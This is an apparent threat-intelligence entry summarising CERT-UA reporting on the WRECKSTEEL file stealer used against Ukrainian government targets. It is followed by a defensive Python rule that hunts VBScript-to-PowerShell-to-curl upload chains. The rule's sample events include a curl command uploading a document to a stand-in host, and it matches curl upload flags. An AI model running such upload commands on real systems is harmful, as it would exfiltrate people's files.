Cyber Espionage using PowerShell stealer WRECKSTEEL

NetmanageIT OpenCTI - opencti.netmanageit.com



SUMMARY :

The Ukrainian government's CERT-UA has identified a series of cyberattacks against government agencies and critical infrastructure facilities in Ukraine during March 2025. The attacks, aimed at information theft, use compromised accounts to distribute emails with links to public file services. These links download a VBScript loader, which then launches a PowerShell script that searches for specific file types and uploads them using cURL. The malicious activity, tracked as UAC-0219, has been ongoing since fall 2024. The primary tool, classified as WRECKSTEEL, exists in both VBScript and PowerShell versions. Earlier attacks in 2024 used EXE files created with NSIS installers, containing decoy documents and the IrfanView program for taking screenshots. CERT-UA urges immediate reporting of any detected signs of a cyberattack.
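The chain described above (VBScript loader, then PowerShell, then a cURL upload) can be hunted in process-creation telemetry by walking parent/child links. The following is an added example, not code from CERT-UA or from this report; the event field names (`pid`, `ppid`, `image`, `cmdline`), the list of cURL upload options, and the sample events are assumptions constructed for illustration.

```python
import re

# Windows script hosts that run VBScript, and PowerShell host binaries.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# curl options that send local files or data (assumed heuristic, not taken from the report).
CURL_UPLOAD = re.compile(r"(?<!\S)(-F|--form|-T|--upload-file|-d|--data|--data-binary)(?=\s|=|$)")

def image_name(path):
    """Lower-cased file name of an executable path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_chains(events):
    """Return (script_pid, ps_pid, curl_pid) for each script host -> PowerShell -> curl upload."""
    # PIDs are reused over time; a production rule should key on process GUID or start time.
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if image_name(e["image"]) != "curl.exe" or not CURL_UPLOAD.search(e["cmdline"]):
            continue
        ps = by_pid.get(e["ppid"])
        if ps is None or image_name(ps["image"]) not in POWERSHELL:
            continue
        host = by_pid.get(ps["ppid"])
        if host is not None and image_name(host["image"]) in SCRIPT_HOSTS:
            hits.append((host["pid"], ps["pid"], e["pid"]))
    return hits

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe", "cmdline": r'wscript.exe "C:\Users\user\Downloads\document.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": r"powershell.exe -File C:\Users\user\AppData\Local\Temp\script.ps1"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\curl.exe", "cmdline": r'curl.exe -F "file=@C:\Users\user\Documents\report.docx" https://upload.example.invalid/'},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe -s -o out.html https://example.com/"},
    {"pid": 700, "ppid": 500, "image": r"C:\Windows\System32\curl.exe", "cmdline": r"curl.exe -T build.zip https://example.com/artifacts/"},
]

if __name__ == "__main__":
    print(find_chains(SAMPLE_EVENTS))
```

The interactive PowerShell session (PID 500) is not flagged even when it uploads with `-T`, because its parent is not a script host; the full three-process lineage is what keeps the rule narrow.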

OPENCTI LABELS :

powershell, ukraine, critical infrastructure, vbscript, cyber espionage, government, file stealing, wrecksteel

